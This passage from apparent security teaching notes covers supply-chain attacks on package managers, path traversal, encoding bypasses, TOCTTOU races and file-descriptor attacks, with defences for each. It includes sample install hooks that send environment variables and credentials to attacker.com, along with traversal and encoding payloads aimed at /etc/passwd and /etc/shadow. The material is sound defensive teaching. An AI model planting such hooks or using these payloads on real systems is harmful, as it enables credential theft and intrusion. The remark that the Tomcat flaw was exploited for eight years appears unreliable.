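# name, preferring the highest version number picks the attacker's package.

def resolve(name, indexes):
    """Return (version, index_name) for the highest version across all indexes."""
    candidates = [
        (versions[name], index_name)
        for index_name, versions in indexes.items()
        if name in versions
    ]
    return max(candidates, key=lambda c: tuple(map(int, c[0].split("."))))

indexes = {
    "internal": {"company-utils": "1.4.2"},    # legitimate internal package
    "public":   {"company-utils": "99.0.0"},   # attacker's confusion upload
}

print(resolve("company-utils", indexes))  # ('99.0.0', 'public')
```

Real resolvers are far more complex, but several behaved essentially this way before the 2021 disclosures.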

The 2021 Microsoft/Apple/Tesla incident

Security researcher Alex Birsan demonstrated dependency confusion by uploading harmless test packages mimicking internal package names he discovered from various companies. His packages were automatically downloaded and installed by build systems at Microsoft, Apple, Tesla, and dozens of other companies.

The packages simply logged when and where they were installed, proving that malicious code could have executed with the same ease. Birsan responsibly disclosed the vulnerabilities and was awarded over $130,000 in bug bounties.

Defending against dependency confusion

Configure package manager priority: Set private repositories to be checked first:


# npm: Use .npmrc
@company:registry=https://internal-registry.company.com/

# pip: Use pip.conf or the command line
pip install --index-url https://internal-pypi.company.com/ --extra-index-url https://pypi.org/simple/ package-name
# Caution: pip treats every index as an equal candidate, so --extra-index-url
# alone does not prevent confusion; prefer a single internal index that
# proxies approved public packages.

Use scoped packages: Scope names to your organization:

// npm packages scoped to @company
"dependencies": {
    "@company/internal-package": "1.0.0"
}

Package name reservation: Some package repositories allow reserving names. Register your internal package names on public repositories even if you don't publish them.

Network isolation: Restrict build systems' access to public package repositories, requiring all packages to flow through internal repositories first.

AI-assisted malware recommendations

Large language models and AI coding assistants can inadvertently recommend malicious or non-existent packages. As developers increasingly rely on AI for code suggestions, this creates a new supply chain risk.

Hallucinated packages

AI models may suggest package names that sound plausible but don't exist. Attackers monitor AI outputs and create packages with these hallucinated names.

Example:

Developer: "How do I parse YAML in Python?"
AI: "Use the yaml-parser package"  # Doesn't exist or is malicious
Developer: pip install yaml-parser  # Installs attacker's package

The legitimate package is PyYAML. The AI's suggested name sounds reasonable, and developers may install it without verification.

Outdated recommendations

AI models trained on historical data may recommend packages that were safe during training but have since been deprecated, abandoned, hijacked through a compromised maintainer account, or deleted and re-registered by an attacker.

Context confusion

AI may misunderstand requirements and suggest packages with similar functionality from less reputable sources when secure, widely-used alternatives exist.

Defense

Verify package names: Never install packages based solely on AI recommendations. Check official documentation and package repository pages.

Cross-reference recommendations: Search for the package on the official repository website and verify download counts, last update date, and maintainer history.

Use established packages: When AI suggests an obscure package, search for alternatives with larger user bases and longer track records.

Package installation hooks

Package managers allow executing code during installation. Malicious packages exploit these hooks to run code before developers even import the package.

Installation script mechanisms

Python setup.py: Arbitrary Python code runs during pip install:


# setup.py
import os
import subprocess

# Malicious code executes during installation
subprocess.run(['curl', 'http://attacker.com', '-d', str(dict(os.environ))])

from setuptools import setup
setup(name='malicious-package', ...)

npm lifecycle scripts: Scripts run at different installation phases:

{
  "scripts": {
    "preinstall": "node malicious.js",
    "postinstall": "curl http://attacker.com/steal-credentials"
  }
}

Ruby Gems extensions: Can compile and run native code during installation.

What malicious installation scripts do

Once executed with the developer's privileges, malicious scripts can:

Steal credentials: SSH keys, cloud provider credentials such as AWS access keys, API tokens, and saved passwords.

Establish persistence: modify shell startup files, install cron jobs or launch agents, or plant backdoors in other projects on the machine.

Exfiltrate data: upload source code, configuration files, and environment variables to attacker-controlled servers.

Cryptocurrency mining: Install miners that use CPU/GPU resources.

The code runs during installation, not when the package is imported or used. Developers may not notice until significant damage is done.

Defenses for developers

Verify package names carefully

Double-check spelling: Copy package names from official documentation rather than typing them.

Check package details before installing: look at the repository page for download counts, release history, maintainer identity, and a link to the source repository.

Pin exact versions

Specify exact versions in dependency files to prevent automatic updates to compromised versions:


# Python requirements.txt
requests==2.28.1  # Pin exact version, not >=2.28.1

// npm package.json
"dependencies": {
    "express": "4.18.2"  // Not ^4.18.2 which allows updates
}

Use lock files

Lock files ensure consistent versions across all environments: package-lock.json (npm), Gemfile.lock (RubyGems), and poetry.lock or Pipfile.lock (Python) record the exact resolved version and checksum of every dependency, direct and transitive.

Commit lock files to version control so all developers and build systems use identical dependency versions.

Review dependencies regularly

Audit tools scan for known vulnerabilities:

npm audit
pip-audit
bundle audit  # Ruby
mvn dependency-check:check  # Maven

Run these regularly and update packages with known security issues.

Minimize dependencies

Each dependency is a potential attack vector. Before adding one, ask whether a few lines of your own code could provide the same functionality, whether the package is actively maintained, and how many transitive dependencies it drags in.

Check package reputation

Before using a package, check its download counts, age, release history, and maintainer activity on the official repository website.

Avoid packages with low downloads, recent creation dates, or single inactive maintainers.

Defenses for organizations

Private package repositories

Host approved packages in internal repositories, using tools such as JFrog Artifactory, Sonatype Nexus, or a caching proxy in front of the public registries.

Configure package managers to check internal repositories first or exclusively.

Package vetting process

Establish review procedures before allowing packages in production:

  1. Security team reviews package source code

  2. Automated scanning for known malware patterns

  3. Check package reputation and maintainer history

  4. Trial period in non-production environments

  5. Approval required before production use

Network controls

Restrict outbound access from build systems: allow connections only to the internal package repository, block direct access to public registries, and log every package download for later audit.

Software Bill of Materials (SBOM)

Maintain a comprehensive inventory of all dependencies, direct and transitive, with versions, sources, and licenses; standard formats such as SPDX and CycloneDX make the SBOM machine-readable.

SBOM enables rapid response when vulnerabilities are discovered in dependencies.

Dependency scanning in CI/CD

CI/CD stands for Continuous Integration and Continuous Delivery: DevOps practices that automate the build, test, and deployment of software. This process creates a pipeline that allows development teams to deliver code changes frequently and reliably, and it is a natural place to add checks by integrating automated scanning into the build:


# Example GitHub Actions workflow
- name: Scan dependencies
  run: |
    npm audit
    npm run snyk-test

- name: Fail on high-severity issues
  run: |
    npm audit --audit-level=high

Prevent deploying code with known vulnerable dependencies.

Why package attacks are effective

Package manager attacks succeed because:

Trust assumption: Developers assume public repositories are curated and safe. The repositories contain millions of packages; comprehensive manual review is impossible.

Transitive dependencies: Modern applications depend on hundreds of packages, most brought in indirectly. A single compromised dependency deep in the tree affects thousands of projects.

Automatic execution: Installation scripts run without user interaction or obvious warnings. The code executes before developers inspect the package.

Privilege escalation: Installation runs with developer or build system privileges, often including access to credentials and source code.

Wide impact: A single compromised popular package affects thousands or millions of projects. The left-pad incident in 2016 showed how removing one tiny npm package broke builds worldwide.

This is supply chain compromise: attacking the software supply chain rather than the final application. It's often more effective than finding vulnerabilities in well-maintained applications because a single compromised dependency reaches every project that uses it, and the injected code runs with the trust and privileges already granted to the build process.

Package management security requires vigilance at every level: individual developers verifying packages, organizations vetting dependencies, and repository maintainers implementing protective measures. The ecosystem's convenience creates systemic risk that all participants must actively mitigate.


Path Traversal Vulnerabilities

Path traversal attacks exploit how applications validate file paths. They allow attackers to access files outside the intended directory.

The basic attack

Web servers and other applications often accept file paths from users but intend to restrict access to a specific directory. For example, a web server might serve files only from /var/www/html.

An attacker can try to escape this restriction using .. (dot-dot), which refers to the parent directory:

http://example.com/../../../etc/passwd

If the application naively concatenates this to its base directory:

/var/www/html/../../../etc/passwd

it resolves to /etc/passwd, exposing the system password file.

Why path traversal is difficult to prevent

Simply blocking .. is insufficient. Consider these complications:

Dot-dot can appear anywhere in the path:

http://example.com/images/../../../../../../etc/passwd

Dot-dot is not always malicious:

http://example.com/docs/../index.html

This navigates to a parent and back down, which should be allowed if it stays within bounds.

Legitimate filenames can contain dots:

http://example.com/notes/file..with..dots.txt
http://example.com/notes/whatever../
http://example.com/notes/..more.stuff/

These should be accepted. The application cannot simply search for the substring ...

Multiple slashes are legal:

http://example.com////notes///////index.html

Unix treats multiple consecutive slashes as a single slash. This is valid and should not be rejected.

URL encoding obfuscates dots:

http://example.com/%2e%2e/%2e%2e/etc/passwd

Here %2e is the URL encoding for a dot. The application might check for .. before decoding, allowing the attack through.

Path equivalence

A related problem is path equivalence: different path strings that refer to the same file. Attackers use this to bypass security checks that examine the path string without resolving it.

Example: If a server blocks access to /admin/config.php, an attacker might try:

/admin/../admin/config.php

This reaches the same file but looks different to a string comparison. If the security check only examines the literal path string, it may not recognize this as a blocked path.

Internal dots and symbolic links

Paths can include . (single dot), which means "current directory":

/admin/./config.php
/admin/././././config.php

These resolve to /admin/config.php but don't match a simple string comparison for /admin/config.php.

Symbolic links add another layer of equivalence. A link from /public/data to /private/secrets means that /public/data/file.txt and /private/secrets/file.txt are the same file. An application that restricts access based on path prefixes may not account for this.

Platform-specific path parsing

Different operating systems and applications parse paths differently, creating additional attack opportunities.

Windows path conversion

Windows supports two path formats:

DOS-style:

C:\directory\file.txt

NT-style:

\??\C:\directory\file.txt

When Windows converts DOS paths to NT paths, it applies normalization rules. One rule removes trailing dots and spaces from path components. An attacker can exploit this: a request for secret.txt. (with a trailing dot) does not match a string check for secret.txt, yet normalization maps it to the same file after the check has run.

This allows hiding files or processes in plain sight.

Apache Tomcat internal dot vulnerability

A 2025 vulnerability (CVE-2025-24813) in Apache Tomcat, actively exploited for eight years before discovery, involved path processing in servlets configured with write permissions.

The code generated temporary filenames by replacing path separators (/) with internal dots (.). This led to improper security checks: attackers could craft request paths whose dots and separators were interpreted inconsistently, use partial PUT requests to write content (such as a serialized session object) to locations the checks should have blocked, and in some configurations trigger deserialization of that upload to achieve remote code execution.

Defenses against path traversal

Resolve paths to their absolute form before validation: Use operating system functions to resolve all ., .., symbolic links (shortcuts that point to other files), and alternate representations to a single absolute path. Then check whether this absolute path is within the allowed directory.
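A minimal sketch of this "resolve first, then validate" rule in Python (function and directory names are illustrative): canonicalize the combined path with realpath, then confirm it still lies under the base directory.

```python
# Canonicalize, then check containment. realpath collapses ".", "..",
# repeated slashes, and symbolic links before the comparison runs.
import os

def safe_join(base, user_path):
    base = os.path.realpath(base)
    full = os.path.realpath(os.path.join(base, user_path.lstrip("/")))
    if full != base and not full.startswith(base + os.sep):
        raise ValueError("path escapes base directory")
    return full

print(safe_join("/tmp", "docs/../notes.txt"))   # resolves inside /tmp: allowed
```

Note that benign uses of .. that stay inside the base directory (like the docs/../index.html example above) pass this check, while any path that resolves outside is rejected.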

Use allowlists for files: If only certain files should be accessible, maintain a list of allowed files and check against it. Path structure becomes irrelevant.

Avoid path concatenation: Instead of concatenating user input to a base directory, use an index or database to map user requests to specific files. The user requests "file_id=42" and the application looks up which file that ID corresponds to. The user never provides the actual path.

Restrict application permissions: Run the application with access only to the directories it needs. Even if path traversal succeeds, the operating system's file permissions prevent accessing sensitive files.


Character Encoding Attacks

Character encoding vulnerabilities arise when applications interpret the same byte sequence in multiple ways. This allows attackers to craft input that passes validation checks but changes meaning when processed.

Unicode IIS vulnerability (2000)

Microsoft IIS had a path traversal check that blocked requests like:

http://example.com/../../system32/cmd.exe

The check happened before URL decoding. An attacker could encode the slash character (/) in ways the check didn't recognize but the decoder would interpret correctly.

UTF-8 overlong encoding

UTF-8 is a character encoding standard that represents characters as one to four bytes. ASCII characters (0-127, which include English letters and common symbols) are represented as single bytes. The UTF-8 standard defines multi-byte representations for characters above 127 (international characters, symbols, emoji).

A slash (/) is character 47, which should be encoded as the single byte 0x2F. The UTF-8 standard requires using the shortest encoding, but many decoders accept longer "overlong" encodings like this two-byte sequence:

1100 0000  1010 1111

In hexadecimal: %C0%AF

The security check saw %C0%AF and didn't recognize it as a path traversal attempt. The URL decoder converted %C0%AF to /, allowing the attack through.
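A strict, conforming UTF-8 decoder refuses the overlong form outright rather than producing a slash. Python's codec, for example:

```python
# The overlong two-byte encoding of "/" (0xC0 0xAF) is invalid UTF-8;
# a strict decoder raises an error instead of decoding it to a slash.
overlong = bytes([0xC0, 0xAF])

try:
    overlong.decode("utf-8")
    print("accepted")
except UnicodeDecodeError as e:
    print("rejected:", e.reason)
```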

Microsoft initially fixed this by rejecting overlong UTF-8 sequences. However, nested encoding still worked.

Double URL encoding

The percent character itself can be encoded: % is %25, so %252e decodes to %2e, which decodes again to a dot (.).

Therefore, an input such as %252e%252e%252f contains no literal dots or slashes, yet becomes ../ after two rounds of decoding.

If the decoder runs multiple times or processes input in stages, these nested encodings pass through initial checks and become malicious characters after full decoding.
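The staged decoding is easy to demonstrate with the standard library's URL decoder: the doubly encoded traversal sequence survives one decode looking harmless.

```python
# One decode pass turns %252e%252e%252f into %2e%2e%2f -- which still passes
# a naive check for "../" -- and a second pass reveals the traversal string.
from urllib.parse import unquote

payload = "%252e%252e%252f"
once = unquote(payload)
twice = unquote(once)
print(once)    # %2e%2e%2f
print(twice)   # ../
```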

Defense against encoding attacks

Decode first, validate second: All URL decoding, character set conversion, and normalization should happen before security checks, not after.

Normalize input to standard form: Convert input to a single, standardized representation before validating. Reject alternate encodings that represent the same character.

Avoid reinventing parsing: Use well-tested libraries for URL decoding and character encoding. Security vulnerabilities often come from custom parsing logic that handles edge cases incorrectly.

Limit character sets: If an application only needs ASCII, reject any input that contains multi-byte characters or requires special encoding.


Time-of-Check to Time-of-Use (TOCTTOU)

TOCTTOU vulnerabilities are race conditions where the state of a resource changes between a security check and the use of that resource.

The pattern

Consider this common programming pattern:

if (allowed to perform action)
    then perform action

There is a time window between checking permission and performing the action. If an attacker can change the relevant state during this window, the check becomes meaningless.

Classic example: lpr

The lpr command on Unix systems is often a setuid program: a program that runs with the privileges of its owner (root) rather than the user who executes it. This gives it root access to write files into the print spool directory.

The program's logic:

  1. Check if the user has read permission on the file they want to print

  2. If yes, copy the file to the spool directory (using root privileges)

An attacker can exploit the time window between steps 1 and 2:

  1. Create a symbolic link (a file that acts as a pointer to another file) named myfile pointing to a readable file

  2. Run lpr myfile & in the background

  3. Immediately change myfile to point to /etc/shadow (the password file)

  4. If timing is right, lpr checks permissions on the readable file but copies /etc/shadow

The attacker has printed a file they shouldn't have access to.

Temporary file race conditions

Many functions create temporary filenames: tmpnam(), tempnam(), mktemp(), GetTempFileName().

These functions return a filename that is currently unused. The application then creates a file with that name. Between getting the filename and creating the file, an attacker might create a file with that exact name, or plant a symbolic link with that name pointing at a file they want the application to overwrite.

When the application creates or writes to "its" temporary file, it's actually working with the attacker's file.

Defenses against TOCTTOU

Atomic operations: Use operations that combine check and use into a single, uninterruptible action. The mkstemp() function creates and opens a file atomically, preventing the race condition.

int fd = mkstemp(template);  // Creates and opens in one operation

File descriptors, not paths: Once a file is open, the file descriptor refers to the specific file, regardless of what happens to the filename. Operations on the file descriptor are not subject to TOCTTOU on the path.
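The same atomic pattern is available in Python via tempfile.mkstemp, which returns an already-open descriptor; subsequent operations use the descriptor, never the name.

```python
# mkstemp creates and opens the file in one atomic step (O_CREAT | O_EXCL),
# so no attacker can slip a file or symlink in between naming and creation.
import os
import tempfile

fd, path = tempfile.mkstemp(prefix="spool-", suffix=".tmp")
try:
    os.write(fd, b"job data\n")   # the descriptor refers to this exact file
finally:
    os.close(fd)
    os.unlink(path)               # remove by name only after work is done
```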

Avoid checking before use: When possible, attempt the operation and handle failure rather than checking whether it will succeed. This eliminates the time window.

Use locking: For resources that can't be accessed atomically, use locking mechanisms to ensure exclusive access during the check-and-use sequence.


File Descriptor Attacks

POSIX systems assign file descriptors to open files. Three descriptors are special: 0 (standard input), 1 (standard output), and 2 (standard error).

Programs assume these exist and use them for console I/O.

The attack

When a program opens a file, the operating system assigns the lowest-numbered unused descriptor. Normally this is 3 or higher since 0-2 are already open.
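This lowest-free-number rule is easy to observe without touching the standard descriptors. A small sketch: free a descriptor, and the very next open() hands its number back.

```python
# The kernel returns the lowest-numbered free descriptor, so a freed number
# is reused on the next open(). (POSIX-specific behavior.)
import os

r, w = os.pipe()                        # allocate two descriptors
os.close(r)                             # free the lower-numbered one
fd = os.open("/dev/null", os.O_RDONLY)
print(fd == r)                          # True: the freed number was reused
os.close(fd)
os.close(w)
```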

But if a descriptor is closed, it becomes available. An attacker can close standard output (descriptor 1) before running a setuid program:

./vulnerable_program >&-

The >&- syntax closes standard output.

When the vulnerable program opens a file, the operating system assigns descriptor 1 because it's now available. Any printf() calls, which normally write to standard output, now write to this file instead.

If the program is setuid root and opens a privileged file, the attacker has corrupted that file with printf() output.

Why this works

The vulnerability exists because:

  1. The program assumes descriptors 0-2 are open and valid

  2. Standard library functions like printf() write to descriptor 1 without checking what it refers to

  3. The operating system reuses closed descriptors

Defense

Programs, especially privileged ones, should verify that standard file descriptors are open before using them or opening other files:

// Ensure stdin, stdout, stderr are open
for (int fd = 0; fd <= 2; fd++) {
    if (fcntl(fd, F_GETFD) == -1 && errno == EBADF) {
        // Descriptor is closed; open /dev/null
        open("/dev/null", O_RDWR);
    }
}

This ensures descriptors 0-2 are open before the program performs any file operations.


Input Validation Principles

Input validation defends against all these injection attacks. However, validation is difficult to get right.

Validation approaches

Allowlisting: Specify what is allowed. Accept only characters, patterns, or values that are explicitly permitted. This is the safest approach because unknown inputs are rejected by default.

Example: A username field might accept only lowercase letters, numbers, and underscores, limited to 3-20 characters.
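The username rule above is a one-line allowlist in code: anything outside the permitted alphabet or length fails, with no need to enumerate dangerous characters.

```python
# Allowlist check: only lowercase letters, digits, and underscores,
# 3-20 characters. Everything else is rejected by default.
import re

USERNAME_RE = re.compile(r"[a-z0-9_]{3,20}")

def valid_username(name):
    return USERNAME_RE.fullmatch(name) is not None

print(valid_username("paul_k"))       # True
print(valid_username("pk"))           # False: too short
print(valid_username("paul'; --"))    # False: disallowed characters
```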

Denylisting: Specify what is forbidden. Reject input that contains dangerous patterns. This is less safe because attackers find bypasses. There are often more ways to encode malicious input than a denylist can anticipate.

Example: Blocking quotes and semicolons in SQL injection prevention fails against encoding attacks and legitimate uses of these characters.

Common validation errors

Incomplete denylists: Attempting to block all dangerous characters or patterns usually fails. Attackers find creative encodings, alternative syntax, or edge cases not covered by the denylist.

Validation order matters: Decode and normalize input before validating. Validating before decoding misses encoded attacks.

Context matters: What's dangerous depends on how input is used. A quote character is dangerous in SQL but harmless in a plain text field. Validation must consider the destination context.

Length limits are not security: Limiting input length is good practice but doesn't prevent injection. A short payload can still contain malicious syntax.

Safer alternatives to validation

Use APIs that separate data from commands: Parameterized queries, prepared statements, and argument arrays prevent interpretation of user input as syntax.
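For instance, with parameterized queries the injection string from the introduction becomes harmless. This sketch uses sqlite3 and a toy table modeled on the login example; the placeholders bind input as values, so it can never alter the statement's structure.

```python
# Parameterized query: "?" placeholders bind user input as data, so the
# classic "' OR 1=1 ; --" payload is matched literally, not parsed as SQL.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE logininfo (username TEXT, password TEXT)")
conn.execute("INSERT INTO logininfo VALUES ('paul', 'hunter2')")

def login(uname, passwd):
    cur = conn.execute(
        "SELECT * FROM logininfo WHERE username = ? AND password = ?",
        (uname, passwd),
    )
    return cur.fetchone() is not None

print(login("paul", "hunter2"))         # True
print(login("paul", "' OR 1=1 ; --"))   # False: payload is just a string
```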

Avoid dynamic command construction: When possible, don't build commands from strings at all. Use fixed command structures with data passed separately.
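Argument arrays illustrate the same principle for shell commands: passing a list to subprocess.run executes the program directly, with no shell to interpret metacharacters. The hostile string below is delivered as one inert argument.

```python
# Argument-array execution: no shell is involved, so semicolons and other
# metacharacters in the input are just bytes in a single argument.
import subprocess

hostile = "nonexistent; rm -rf /tmp/x"   # dangerous only if a shell parsed it
result = subprocess.run(["ls", hostile], capture_output=True, text=True)
print(result.returncode != 0)            # True: ls saw one odd filename, no rm ran
```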

Normalize before checking: Convert input to its standard form before security checks. All ., .., symbolic links, and encodings should be resolved first.

Minimize trust boundaries: The fewer places untrusted input enters the system, the fewer places that need validation. Validate at entry points and treat everything beyond those points as safe.


Comprehension Errors

Most injection vulnerabilities arise from misunderstandings: programmers don't fully grasp how systems parse and interpret input.

Examples of common misunderstandings: assuming that escaping quotes is sufficient to stop SQL injection, not realizing that system() invokes a shell that interprets metacharacters, validating paths before decoding and normalizing them, or trusting that a filename string uniquely identifies a file.

Complex APIs invite these errors. Consider Windows CreateProcess():

BOOL WINAPI CreateProcess(
  _In_opt_    LPCTSTR               lpApplicationName,
  _Inout_opt_ LPTSTR                lpCommandLine,
  _In_opt_    LPSECURITY_ATTRIBUTES lpProcessAttributes,
  _In_opt_    LPSECURITY_ATTRIBUTES lpThreadAttributes,
  _In_        BOOL                  bInheritHandles,
  _In_        DWORD                 dwCreationFlags,
  _In_opt_    LPVOID                lpEnvironment,
  _In_opt_    LPCTSTR               lpCurrentDirectory,
  _In_        LPSTARTUPINFO         lpStartupInfo,
  _Out_       LPPROCESS_INFORMATION lpProcessInformation
);

A programmer who uses this infrequently is unlikely to understand all security implications of each parameter. They may copy an example from Stack Overflow, tutorial code, or use the output of a large language model without comprehending subtle security properties.

Reducing misunderstandings

Prefer simple, safe APIs: APIs that are hard to misuse reduce errors. Parameterized queries are simpler and safer than manual escaping.

Provide secure examples: Documentation and tutorials should demonstrate secure usage. Insecure examples propagate through copying.

Make insecure options hard to reach: Default behaviors should be secure. Insecure options should require explicit choices and warnings.

Education and code review: Developers need training on platform-specific quirks and common pitfalls. Code review catches mistakes that automated tools miss.


Defense in Depth for Injection Attacks

Like memory vulnerabilities, injection attacks are best defended through layered protections:

1. Input validation at boundaries: Validate all external input at entry points. Use allowlists where possible.

2. Safe APIs: Use parameterized queries, argument arrays, and APIs that separate data from commands.

3. Least privilege: Run programs with minimum necessary privileges. Injection vulnerabilities cause less damage when the compromised process has limited access.

4. Sandboxing: Isolate programs so that even if compromised, they cannot access sensitive resources or execute dangerous operations.

5. Security reviews and testing: Code review and penetration testing find vulnerabilities that other measures miss.

6. Monitoring and logging: Detect exploitation attempts through monitoring for suspicious input patterns and unexpected system behavior.

No single defense is perfect. Defense in depth ensures that bypassing one layer still leaves others in place.